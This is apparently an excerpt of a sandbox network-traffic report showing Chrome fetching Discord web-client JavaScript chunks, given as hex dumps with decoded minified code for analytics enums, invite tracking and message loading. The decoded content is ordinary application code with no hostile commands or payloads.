                                                                          2023-12-10 16:45:11 UTC243INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 31 34 38 37 35 22 5d 2c 7b 38 31 32 32 30 34 3a 66 75 6e 63 74 69 6f 6e 28 5f 2c 45 2c 65 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 72 28 45 29 2c 65 2e 64 28 45 2c 7b 64 65 66 61 75 6c 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 54 7d 7d 29 2c 28 69 3d 49 7c 7c 28 49 3d 7b 7d 29 29 2e 50 4f 50 4f 55 54 5f 57 49 4e 44 4f 57 3d 22 70 6f 70 6f 75 74 20 77 69 6e 64 6f 77 22 2c 69 2e 4f 56 45 52 4c 41 59 3d 22 6f 76 65 72 6c 61 79 22 2c 69 2e 4e 4f 54 49 43 45 3d 22 6e 6f 74 69 63 65 22
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["14875"],{812204:function(_,E,e){"use strict";e.r(E),e.d(E,{default:function(){return T}}),(i=I||(I={})).POPOUT_WINDOW="popout window",i.OVERLAY="overlay",i.NOTICE="notice"
                                                                          2023-12-10 16:45:11 UTC1369INData Raw: 2c 69 2e 50 52 45 4d 49 55 4d 5f 55 50 53 45 4c 4c 5f 54 4f 4f 4c 54 49 50 3d 22 70 72 65 6d 69 75 6d 20 75 70 73 65 6c 6c 20 74 6f 6f 6c 74 69 70 22 2c 69 2e 42 41 44 47 45 3d 22 62 61 64 67 65 22 2c 69 2e 55 53 45 52 5f 53 45 54 54 49 4e 47 53 3d 22 75 73 65 72 20 73 65 74 74 69 6e 67 73 22 2c 69 2e 55 53 45 52 5f 53 45 54 54 49 4e 47 53 5f 4d 45 4e 55 3d 22 75 73 65 72 20 73 65 74 74 69 6e 67 73 20 6d 65 6e 75 22 2c 69 2e 41 43 43 4f 55 4e 54 3d 22 61 63 63 6f 75 6e 74 22 2c 69 2e 54 45 58 54 5f 41 4e 44 5f 49 4d 41 47 45 53 3d 22 74 65 78 74 20 61 6e 64 20 69 6d 61 67 65 73 22 2c 69 2e 47 55 49 4c 44 5f 53 45 54 54 49 4e 47 53 3d 22 67 75 69 6c 64 20 73 65 74 74 69 6e 67 73 22 2c 69 2e 4f 56 45 52 56 49 45 57 3d 22 6f 76 65 72 76 69 65 77 22 2c 69 2e
                                                                          Data Ascii: ,i.PREMIUM_UPSELL_TOOLTIP="premium upsell tooltip",i.BADGE="badge",i.USER_SETTINGS="user settings",i.USER_SETTINGS_MENU="user settings menu",i.ACCOUNT="account",i.TEXT_AND_IMAGES="text and images",i.GUILD_SETTINGS="guild settings",i.OVERVIEW="overview",i.
                                                                          2023-12-10 16:45:11 UTC1369INData Raw: 69 2e 50 52 45 4d 49 55 4d 5f 55 4e 43 41 4e 43 45 4c 5f 4d 4f 44 41 4c 3d 22 70 72 65 6d 69 75 6d 20 75 6e 63 61 6e 63 65 6c 20 6d 6f 64 61 6c 22 2c 69 2e 50 41 53 54 5f 44 55 45 5f 4f 4e 45 5f 54 49 4d 45 5f 50 41 59 4d 45 4e 54 5f 4d 45 54 48 4f 44 5f 42 41 4e 4e 45 52 3d 22 70 61 73 74 20 64 75 65 20 6f 6e 65 20 74 69 6d 65 20 70 61 79 6d 65 6e 74 20 6d 65 74 68 6f 64 20 62 61 6e 6e 65 72 22 2c 69 2e 53 54 52 45 41 4d 5f 51 55 41 4c 49 54 59 5f 49 4e 44 49 43 41 54 4f 52 3d 22 73 74 72 65 61 6d 20 71 75 61 6c 69 74 79 20 69 6e 64 69 63 61 74 6f 72 22 2c 69 2e 50 52 45 4d 49 55 4d 5f 54 49 45 52 5f 30 5f 54 52 49 41 4c 5f 45 4e 44 49 4e 47 5f 4e 4f 54 49 43 45 3d 22 70 72 65 6d 69 75 6d 20 74 69 65 72 20 30 20 74 72 69 61 6c 20 65 6e 64 69 6e 67 20 6e
                                                                          Data Ascii: i.PREMIUM_UNCANCEL_MODAL="premium uncancel modal",i.PAST_DUE_ONE_TIME_PAYMENT_METHOD_BANNER="past due one time payment method banner",i.STREAM_QUALITY_INDICATOR="stream quality indicator",i.PREMIUM_TIER_0_TRIAL_ENDING_NOTICE="premium tier 0 trial ending n
                                                                          2023-12-10 16:45:11 UTC1369INData Raw: 73 75 62 73 63 72 69 70 74 69 6f 6e 20 63 61 6e 63 65 6c 20 64 6f 77 6e 67 72 61 64 65 20 6d 6f 64 61 6c 22 2c 69 2e 47 55 49 4c 44 5f 48 45 41 44 45 52 3d 22 67 75 69 6c 64 20 68 65 61 64 65 72 22 2c 69 2e 47 55 49 4c 44 5f 42 41 4e 4e 45 52 3d 22 67 75 69 6c 64 20 62 61 6e 6e 65 72 22 2c 69 2e 47 55 49 4c 44 5f 42 41 4e 4e 45 52 5f 4e 4f 54 49 43 45 3d 22 67 75 69 6c 64 20 62 61 6e 6e 65 72 20 6e 6f 74 69 63 65 22 2c 69 2e 47 55 49 4c 44 5f 42 4f 4f 53 54 5f 50 55 52 43 48 41 53 45 5f 4d 4f 44 41 4c 3d 22 67 75 69 6c 64 20 62 6f 6f 73 74 20 70 75 72 63 68 61 73 65 20 6d 6f 64 61 6c 22 2c 69 2e 47 55 49 4c 44 5f 42 4f 4f 53 54 5f 43 41 4e 43 45 4c 4c 41 54 49 4f 4e 5f 4d 4f 44 41 4c 3d 22 67 75 69 6c 64 20 62 6f 6f 73 74 20 63 61 6e 63 65 6c 6c 61 74 69
                                                                          Data Ascii: subscription cancel downgrade modal",i.GUILD_HEADER="guild header",i.GUILD_BANNER="guild banner",i.GUILD_BANNER_NOTICE="guild banner notice",i.GUILD_BOOST_PURCHASE_MODAL="guild boost purchase modal",i.GUILD_BOOST_CANCELLATION_MODAL="guild boost cancellati
                                                                          2023-12-10 16:45:11 UTC1369INData Raw: 75 6d 20 63 68 61 6e 6e 65 6c 22 2c 69 2e 46 49 4c 45 5f 55 50 4c 4f 41 44 5f 50 4f 50 4f 55 54 3d 22 66 69 6c 65 20 75 70 6c 6f 61 64 20 70 6f 70 6f 75 74 22 2c 69 2e 45 4d 4f 4a 49 3d 22 65 6d 6f 6a 69 22 2c 69 2e 50 52 4f 46 49 4c 45 3d 22 70 72 6f 66 69 6c 65 22 2c 69 2e 50 52 4f 46 49 4c 45 5f 4d 4f 44 41 4c 3d 22 70 72 6f 66 69 6c 65 20 6d 6f 64 61 6c 22 2c 69 2e 50 52 4f 46 49 4c 45 5f 50 4f 50 4f 55 54 3d 22 70 72 6f 66 69 6c 65 20 70 6f 70 6f 75 74 22 2c 69 2e 47 55 49 4c 44 5f 50 52 4f 46 49 4c 45 3d 22 67 75 69 6c 64 20 70 72 6f 66 69 6c 65 22 2c 69 2e 45 44 49 54 5f 41 56 41 54 41 52 3d 22 65 64 69 74 20 61 76 61 74 61 72 22 2c 69 2e 45 44 49 54 5f 42 41 4e 4e 45 52 3d 22 65 64 69 74 20 62 61 6e 6e 65 72 22 2c 69 2e 43 48 41 54 5f 49 4e 50 55
                                                                          Data Ascii: um channel",i.FILE_UPLOAD_POPOUT="file upload popout",i.EMOJI="emoji",i.PROFILE="profile",i.PROFILE_MODAL="profile modal",i.PROFILE_POPOUT="profile popout",i.GUILD_PROFILE="guild profile",i.EDIT_AVATAR="edit avatar",i.EDIT_BANNER="edit banner",i.CHAT_INPU
                                                                          2023-12-10 16:45:11 UTC1369INData Raw: 6d 20 6d 61 72 6b 65 74 69 6e 67 20 74 69 65 72 20 63 61 72 64 22 2c 69 2e 50 52 45 4d 49 55 4d 5f 4d 41 52 4b 45 54 49 4e 47 5f 50 45 52 4b 5f 43 41 52 44 3d 22 70 72 65 6d 69 75 6d 20 6d 61 72 6b 65 74 69 6e 67 20 70 65 72 6b 20 63 61 72 64 22 2c 69 2e 50 52 45 4d 49 55 4d 5f 4d 41 52 4b 45 54 49 4e 47 5f 46 45 41 54 55 52 45 3d 22 70 72 65 6d 69 75 6d 20 6d 61 72 6b 65 74 69 6e 67 20 66 65 61 74 75 72 65 22 2c 69 2e 50 52 45 4d 49 55 4d 5f 4d 41 52 4b 45 54 49 4e 47 5f 43 4f 4d 50 41 52 49 53 4f 4e 5f 54 41 42 4c 45 3d 22 70 72 65 6d 69 75 6d 20 6d 61 72 6b 65 74 69 6e 67 20 63 6f 6d 70 61 72 69 73 6f 6e 20 74 61 62 6c 65 22 2c 69 2e 50 52 45 4d 49 55 4d 5f 4d 41 52 4b 45 54 49 4e 47 5f 46 4f 4f 54 45 52 3d 22 70 72 65 6d 69 75 6d 20 6d 61 72 6b 65 74
                                                                          Data Ascii: m marketing tier card",i.PREMIUM_MARKETING_PERK_CARD="premium marketing perk card",i.PREMIUM_MARKETING_FEATURE="premium marketing feature",i.PREMIUM_MARKETING_COMPARISON_TABLE="premium marketing comparison table",i.PREMIUM_MARKETING_FOOTER="premium market
                                                                          2023-12-10 16:45:11 UTC1369INData Raw: 43 48 41 4e 4e 45 4c 5f 4d 45 4e 55 3d 22 63 68 61 6e 6e 65 6c 20 6c 69 73 74 20 74 65 78 74 20 63 68 61 6e 6e 65 6c 20 6d 65 6e 75 22 2c 69 2e 43 48 41 4e 4e 45 4c 5f 4c 49 53 54 5f 54 48 52 45 41 44 5f 4d 45 4e 55 3d 22 63 68 61 6e 6e 65 6c 20 6c 69 73 74 20 74 68 72 65 61 64 20 6d 65 6e 75 22 2c 69 2e 43 48 41 4e 4e 45 4c 5f 4c 49 53 54 5f 56 4f 49 43 45 5f 43 48 41 4e 4e 45 4c 5f 4d 45 4e 55 3d 22 63 68 61 6e 6e 65 6c 20 6c 69 73 74 20 76 6f 69 63 65 20 63 68 61 6e 6e 65 6c 20 6d 65 6e 75 22 2c 69 2e 43 48 41 4e 4e 45 4c 5f 54 49 54 4c 45 5f 4d 45 4e 55 3d 22 63 68 61 6e 6e 65 6c 20 74 69 74 6c 65 20 6d 65 6e 75 22 2c 69 2e 47 52 4f 55 50 5f 44 4d 5f 4d 45 4e 55 3d 22 67 72 6f 75 70 20 64 6d 20 6d 65 6e 75 22 2c 69 2e 41 55 44 49 54 5f 4c 4f 47 5f 55
                                                                          Data Ascii: CHANNEL_MENU="channel list text channel menu",i.CHANNEL_LIST_THREAD_MENU="channel list thread menu",i.CHANNEL_LIST_VOICE_CHANNEL_MENU="channel list voice channel menu",i.CHANNEL_TITLE_MENU="channel title menu",i.GROUP_DM_MENU="group dm menu",i.AUDIT_LOG_U
                                                                          2023-12-10 16:45:11 UTC1369INData Raw: 50 52 4f 46 49 4c 45 5f 45 46 46 45 43 54 5f 4d 4f 44 41 4c 3d 22 65 64 69 74 20 70 72 6f 66 69 6c 65 20 65 66 66 65 63 74 20 6d 6f 64 61 6c 22 2c 69 2e 45 44 49 54 5f 50 52 4f 46 49 4c 45 5f 45 46 46 45 43 54 5f 41 43 54 49 4f 4e 5f 53 48 45 45 54 3d 22 65 64 69 74 20 70 72 6f 66 69 6c 65 20 65 66 66 65 63 74 20 61 63 74 69 6f 6e 20 73 68 65 65 74 22 2c 69 2e 41 43 43 4f 55 4e 54 5f 50 52 4f 46 49 4c 45 5f 50 4f 50 4f 55 54 3d 22 61 63 63 6f 75 6e 74 20 70 72 6f 66 69 6c 65 20 70 6f 70 6f 75 74 22 2c 69 2e 43 48 41 4e 4e 45 4c 5f 43 41 4c 4c 5f 4f 56 45 52 46 4c 4f 57 5f 41 43 54 49 4f 4e 5f 53 48 45 45 54 3d 22 63 68 61 6e 6e 65 6c 5f 63 61 6c 6c 5f 6f 76 65 72 66 6c 6f 77 5f 61 63 74 69 6f 6e 5f 73 68 65 65 74 22 2c 69 2e 55 53 45 52 5f 53 45 54 54 49
                                                                          Data Ascii: PROFILE_EFFECT_MODAL="edit profile effect modal",i.EDIT_PROFILE_EFFECT_ACTION_SHEET="edit profile effect action sheet",i.ACCOUNT_PROFILE_POPOUT="account profile popout",i.CHANNEL_CALL_OVERFLOW_ACTION_SHEET="channel_call_overflow_action_sheet",i.USER_SETTI
                                                                          2023-12-10 16:45:11 UTC1369INData Raw: 50 5f 49 43 4f 4e 5f 45 44 49 54 4f 52 3d 22 61 70 70 20 69 63 6f 6e 20 65 64 69 74 6f 72 22 2c 69 2e 43 4c 49 45 4e 54 5f 54 48 45 4d 45 53 5f 45 44 49 54 4f 52 3d 22 63 6c 69 65 6e 74 20 74 68 65 6d 65 73 20 65 64 69 74 6f 72 22 2c 69 2e 43 4c 49 45 4e 54 5f 54 48 45 4d 45 53 5f 54 48 45 4d 45 5f 53 45 4c 45 43 54 4f 52 3d 22 63 6c 69 65 6e 74 20 74 68 65 6d 65 73 20 74 68 65 6d 65 20 73 65 6c 65 63 74 6f 72 22 2c 69 2e 41 55 54 4f 4d 4f 44 5f 50 52 4f 46 49 4c 45 5f 51 55 41 52 41 4e 54 49 4e 45 5f 41 4c 45 52 54 3d 22 61 75 74 6f 6d 6f 64 20 70 72 6f 66 69 6c 65 20 71 75 61 72 61 6e 74 69 6e 65 20 61 6c 65 72 74 22 2c 69 2e 53 48 41 52 45 5f 4e 49 54 52 4f 5f 45 4d 42 45 44 3d 22 73 68 61 72 65 20 6e 69 74 72 6f 20 65 6d 62 65 64 22 2c 69 2e 45 4d 42
                                                                          Data Ascii: P_ICON_EDITOR="app icon editor",i.CLIENT_THEMES_EDITOR="client themes editor",i.CLIENT_THEMES_THEME_SELECTOR="client themes theme selector",i.AUTOMOD_PROFILE_QUARANTINE_ALERT="automod profile quarantine alert",i.SHARE_NITRO_EMBED="share nitro embed",i.EMB


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          253192.168.2.549987162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:11 UTC866OUTGET /assets/31717.600d5111130648c4f7c5.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=Et_uvCR2WvAWQCG5sCUDgjP1KgFJjZLYu4tsYqGll50-1702226711217-0-604800000
                                                                          2023-12-10 16:45:11 UTC971INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 31 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 36 31 30 39 33 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 34 66 34 39 61 62 64 64 61 64 31 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:11 GMTContent-Type: application/javascriptContent-Length: 61093Connection: closeCF-Ray: 8336f4f49abddad1-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.co
                                                                          2023-12-10 16:45:11 UTC1369INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 33 31 37 31 37 22 5d 2c 7b 38 31 39 36 38 39 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 72 28 74 29 2c 6e 2e 64 28 74 2c 7b 64 65 66 61 75 6c 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 53 7d 7d 29 2c 6e 28 22 37 30 31 30 32 22 29 2c 6e 28 22 32 32 32 30 30 37 22 29 2c 6e 28 22 37 30 32 39 37 36 22 29 3b 76 61 72 20 61 3d 6e 28 22 33 39 34 38 34 36 22 29 2c 6c 3d 6e 28 22 38 37 32 37 31 37 22 29 2c 73 3d 6e 28 22 38 31 39 38 35 35 22 29 2c 69 3d 6e 28 22 39 31 33 31 34 34
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["31717"],{819689:function(e,t,n){"use strict";n.r(t),n.d(t,{default:function(){return eS}}),n("70102"),n("222007"),n("702976");var a=n("394846"),l=n("872717"),s=n("819855"),i=n("913144
                                                                          2023-12-10 16:45:11 UTC1369INData Raw: 76 69 74 65 4b 65 79 29 28 74 29 2c 64 3d 78 2e 64 65 66 61 75 6c 74 2e 67 65 74 43 68 61 6e 6e 65 6c 28 6e 29 3b 69 66 28 6e 75 6c 6c 21 3d 64 29 7b 6c 65 74 20 65 3d 6e 75 6c 6c 3b 64 2e 69 73 4d 75 6c 74 69 55 73 65 72 44 4d 28 29 3f 65 3d 65 72 2e 4c 6f 67 67 69 6e 67 49 6e 76 69 74 65 54 79 70 65 73 2e 47 44 4d 5f 49 4e 56 49 54 45 3a 21 64 2e 69 73 50 72 69 76 61 74 65 28 29 26 26 28 65 3d 65 72 2e 4c 6f 67 67 69 6e 67 49 6e 76 69 74 65 54 79 70 65 73 2e 53 45 52 56 45 52 5f 49 4e 56 49 54 45 29 3b 6c 65 74 20 6e 3d 7b 7d 2c 63 3d 57 2e 64 65 66 61 75 6c 74 2e 67 65 74 49 6e 76 69 74 65 28 74 29 3b 69 66 28 6e 75 6c 6c 21 3d 63 26 26 63 2e 73 74 61 74 65 3d 3d 3d 65 72 2e 49 6e 76 69 74 65 53 74 61 74 65 73 2e 52 45 53 4f 4c 56 45 44 26 26 6e 75 6c
                                                                          Data Ascii: viteKey)(t),d=x.default.getChannel(n);if(null!=d){let e=null;d.isMultiUserDM()?e=er.LoggingInviteTypes.GDM_INVITE:!d.isPrivate()&&(e=er.LoggingInviteTypes.SERVER_INVITE);let n={},c=W.default.getInvite(t);if(null!=c&&c.state===er.InviteStates.RESOLVED&&nul
                                                                          2023-12-10 16:45:11 UTC1369INData Raw: 64 54 79 70 65 73 2e 44 49 52 45 43 54 5f 4d 45 53 53 41 47 45 2c 69 6e 76 69 74 65 5f 67 75 69 6c 64 5f 73 63 68 65 64 75 6c 65 64 5f 65 76 65 6e 74 5f 69 64 3a 72 2e 67 75 69 6c 64 53 63 68 65 64 75 6c 65 64 45 76 65 6e 74 49 64 2c 2e 2e 2e 69 7d 2c 75 2e 64 65 66 61 75 6c 74 2e 74 72 61 63 6b 57 69 74 68 4d 65 74 61 64 61 74 61 28 65 72 2e 41 6e 61 6c 79 74 69 63 45 76 65 6e 74 73 2e 49 4e 56 49 54 45 5f 53 45 4e 54 2c 65 29 29 7d 7d 6c 65 74 20 65 68 3d 7b 5b 65 72 2e 41 62 6f 72 74 43 6f 64 65 73 2e 45 4d 41 49 4c 5f 56 45 52 49 46 49 43 41 54 49 4f 4e 5f 52 45 51 55 49 52 45 44 5d 3a 7b 6d 65 73 73 61 67 65 4e 61 6d 65 3a 22 42 4f 54 5f 52 45 51 55 49 52 45 53 5f 45 4d 41 49 4c 5f 56 45 52 49 46 49 43 41 54 49 4f 4e 22 2c 6d 65 73 73 61 67 65 47 65
                                                                          Data Ascii: dTypes.DIRECT_MESSAGE,invite_guild_scheduled_event_id:r.guildScheduledEventId,...i},u.default.trackWithMetadata(er.AnalyticEvents.INVITE_SENT,e))}}let eh={[er.AbortCodes.EMAIL_VERIFICATION_REQUIRED]:{messageName:"BOT_REQUIRES_EMAIL_VERIFICATION",messageGe
                                                                          2023-12-10 16:45:11 UTC1369INData Raw: 74 2e 74 72 61 63 6b 57 69 74 68 4d 65 74 61 64 61 74 61 28 65 72 2e 41 6e 61 6c 79 74 69 63 45 76 65 6e 74 73 2e 41 55 54 4f 4d 41 54 45 44 5f 4d 45 53 53 41 47 45 5f 52 45 43 45 49 56 45 44 2c 7b 6d 65 73 73 61 67 65 5f 61 75 74 68 6f 72 3a 22 43 6c 79 64 65 22 2c 6d 65 73 73 61 67 65 5f 6e 61 6d 65 3a 6e 7d 29 2c 65 6d 2e 72 65 63 65 69 76 65 4d 65 73 73 61 67 65 28 65 2c 28 30 2c 4f 2e 63 72 65 61 74 65 42 6f 74 4d 65 73 73 61 67 65 29 28 7b 63 68 61 6e 6e 65 6c 49 64 3a 65 2c 63 6f 6e 74 65 6e 74 3a 74 2c 6c 6f 67 67 69 6e 67 4e 61 6d 65 3a 6e 7d 29 29 7d 2c 73 65 6e 64 43 6c 79 64 65 45 72 72 6f 72 28 65 29 7b 6c 65 74 20 74 2c 6e 2c 61 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74
                                                                          Data Ascii: t.trackWithMetadata(er.AnalyticEvents.AUTOMATED_MESSAGE_RECEIVED,{message_author:"Clyde",message_name:n}),em.receiveMessage(e,(0,O.createBotMessage)({channelId:e,content:t,loggingName:n}))},sendClydeError(e){let t,n,a=arguments.length>1&&void 0!==argument
                                                                          2023-12-10 16:45:11 UTC1369INData Raw: 4d 65 73 73 61 67 65 73 2e 42 4f 54 5f 44 4d 5f 54 4f 4f 5f 4d 41 4e 59 5f 54 48 52 45 41 44 53 2c 6e 3d 22 54 4f 4f 5f 4d 41 4e 59 5f 54 48 52 45 41 44 53 22 7d 65 6c 73 65 20 61 3d 3d 3d 65 72 2e 41 62 6f 72 74 43 6f 64 65 73 2e 54 4f 4f 5f 4d 41 4e 59 5f 41 4e 4e 4f 55 4e 43 45 4d 45 4e 54 5f 54 48 52 45 41 44 53 3f 28 74 3d 65 6f 2e 64 65 66 61 75 6c 74 2e 4d 65 73 73 61 67 65 73 2e 42 4f 54 5f 44 4d 5f 54 4f 4f 5f 4d 41 4e 59 5f 41 4e 4e 4f 55 4e 43 45 4d 45 4e 54 5f 54 48 52 45 41 44 53 2c 6e 3d 22 54 4f 4f 5f 4d 41 4e 59 5f 41 4e 4e 4f 55 4e 43 45 4d 45 4e 54 5f 54 48 52 45 41 44 53 22 29 3a 61 3d 3d 3d 65 72 2e 41 62 6f 72 74 43 6f 64 65 73 2e 48 41 52 4d 46 55 4c 5f 4c 49 4e 4b 5f 4d 45 53 53 41 47 45 5f 42 4c 4f 43 4b 45 44 3f 28 74 3d 65 6f 2e
                                                                          Data Ascii: Messages.BOT_DM_TOO_MANY_THREADS,n="TOO_MANY_THREADS"}else a===er.AbortCodes.TOO_MANY_ANNOUNCEMENT_THREADS?(t=eo.default.Messages.BOT_DM_TOO_MANY_ANNOUNCEMENT_THREADS,n="TOO_MANY_ANNOUNCEMENT_THREADS"):a===er.AbortCodes.HARMFUL_LINK_MESSAGE_BLOCKED?(t=eo.
                                                                          2023-12-10 16:45:11 UTC1369INData Raw: 72 61 63 6b 4a 75 6d 70 28 74 2c 6e 2c 73 2c 69 29 2c 65 6d 2e 66 65 74 63 68 4d 65 73 73 61 67 65 73 28 7b 63 68 61 6e 6e 65 6c 49 64 3a 74 2c 6c 69 6d 69 74 3a 65 72 2e 4d 41 58 5f 4d 45 53 53 41 47 45 53 5f 46 4f 52 5f 4a 55 4d 50 2c 6a 75 6d 70 3a 7b 6d 65 73 73 61 67 65 49 64 3a 6e 2c 66 6c 61 73 68 3a 61 2c 6f 66 66 73 65 74 3a 6c 2c 72 65 74 75 72 6e 4d 65 73 73 61 67 65 49 64 3a 64 2c 6a 75 6d 70 54 79 70 65 3a 6f 7d 2c 69 73 50 72 65 6c 6f 61 64 3a 72 2c 73 6b 69 70 4c 6f 63 61 6c 46 65 74 63 68 3a 75 7d 29 7d 2c 66 6f 63 75 73 4d 65 73 73 61 67 65 28 65 29 7b 6c 65 74 7b 63 68 61 6e 6e 65 6c 49 64 3a 74 2c 6d 65 73 73 61 67 65 49 64 3a 6e 7d 3d 65 3b 65 6d 2e 66 65 74 63 68 4d 65 73 73 61 67 65 73 28 7b 63 68 61 6e 6e 65 6c 49 64 3a 74 2c 6c 69
                                                                          Data Ascii: rackJump(t,n,s,i),em.fetchMessages({channelId:t,limit:er.MAX_MESSAGES_FOR_JUMP,jump:{messageId:n,flash:a,offset:l,returnMessageId:d,jumpType:o},isPreload:r,skipLocalFetch:u})},focusMessage(e){let{channelId:t,messageId:n}=e;em.fetchMessages({channelId:t,li
                                                                          2023-12-10 16:45:11 UTC1369INData Raw: 6e 26 26 6e 75 6c 6c 3d 3d 61 2c 63 3d 6e 75 6c 6c 21 3d 4d 7c 7c 6c 2e 6c 65 6e 67 74 68 3d 3d 3d 73 26 26 28 72 7c 7c 6f 29 2c 66 3d 6e 75 6c 6c 21 3d 4d 7c 7c 75 26 26 6c 2e 6c 65 6e 67 74 68 3d 3d 3d 73 3b 69 66 28 6e 75 6c 6c 21 3d 4d 29 7b 6c 65 74 20 65 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 73 2f 32 29 2c 6e 3d 5b 4d 2c 2e 2e 2e 6c 2e 6d 61 70 28 65 3d 3e 7b 6c 65 74 7b 69 64 3a 74 7d 3d 65 3b 72 65 74 75 72 6e 20 74 7d 29 5d 2e 66 69 6c 74 65 72 28 28 65 2c 74 2c 6e 29 3d 3e 6e 2e 69 6e 64 65 78 4f 66 28 65 29 3d 3d 3d 74 29 2e 73 6f 72 74 28 65 73 2e 64 65 66 61 75 6c 74 2e 63 6f 6d 70 61 72 65 29 2c 61 3d 6e 2e 69 6e 64 65 78 4f 66 28 4d 29 3b 69 66 28 61 3c 65 26 26 28 63 3d 21 31 29 2c 6c 2e 6c 65 6e 67 74 68 2d 61 3c 65 26 26 28 66 3d 21 31 29
                                                                          Data Ascii: n&&null==a,c=null!=M||l.length===s&&(r||o),f=null!=M||u&&l.length===s;if(null!=M){let e=Math.floor(s/2),n=[M,...l.map(e=>{let{id:t}=e;return t})].filter((e,t,n)=>n.indexOf(e)===t).sort(es.default.compare),a=n.indexOf(M);if(a<e&&(c=!1),l.length-a<e&&(f=!1)
                                                                          2023-12-10 16:45:11 UTC1369INData Raw: 6c 65 74 65 64 26 26 66 2e 6d 65 73 73 61 67 65 73 2e 6c 65 6e 67 74 68 3e 30 29 7b 6c 65 74 20 74 3d 66 2e 6d 65 73 73 61 67 65 73 2e 6c 65 6e 67 74 68 3e 3d 61 26 26 66 2e 63 6f 6e 6e 65 63 74 69 6f 6e 49 64 3d 3d 3d 53 2e 64 65 66 61 75 6c 74 2e 6c 61 73 74 54 69 6d 65 43 6f 6e 6e 65 63 74 65 64 43 68 61 6e 67 65 64 28 29 3b 69 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 4c 4f 43 41 4c 5f 4d 45 53 53 41 47 45 53 5f 4c 4f 41 44 45 44 22 2c 67 75 69 6c 64 49 64 3a 73 2e 67 75 69 6c 64 5f 69 64 2c 63 68 61 6e 6e 65 6c 49 64 3a 65 2c 75 73 65 72 73 3a 66 2e 75 73 65 72 73 2c 6d 65 6d 62 65 72 73 3a 66 2e 6d 65 6d 62 65 72 73 2c 6d 65 73 73 61 67 65 73 3a 66 2e 6d 65 73 73 61 67 65 73 2c 73 74 61 6c 65 3a 21 74 7d 29 7d 7d 2c
                                                                          Data Ascii: leted&&f.messages.length>0){let t=f.messages.length>=a&&f.connectionId===S.default.lastTimeConnectedChanged();i.default.dispatch({type:"LOCAL_MESSAGES_LOADED",guildId:s.guild_id,channelId:e,users:f.users,members:f.members,messages:f.messages,stale:!t})}},
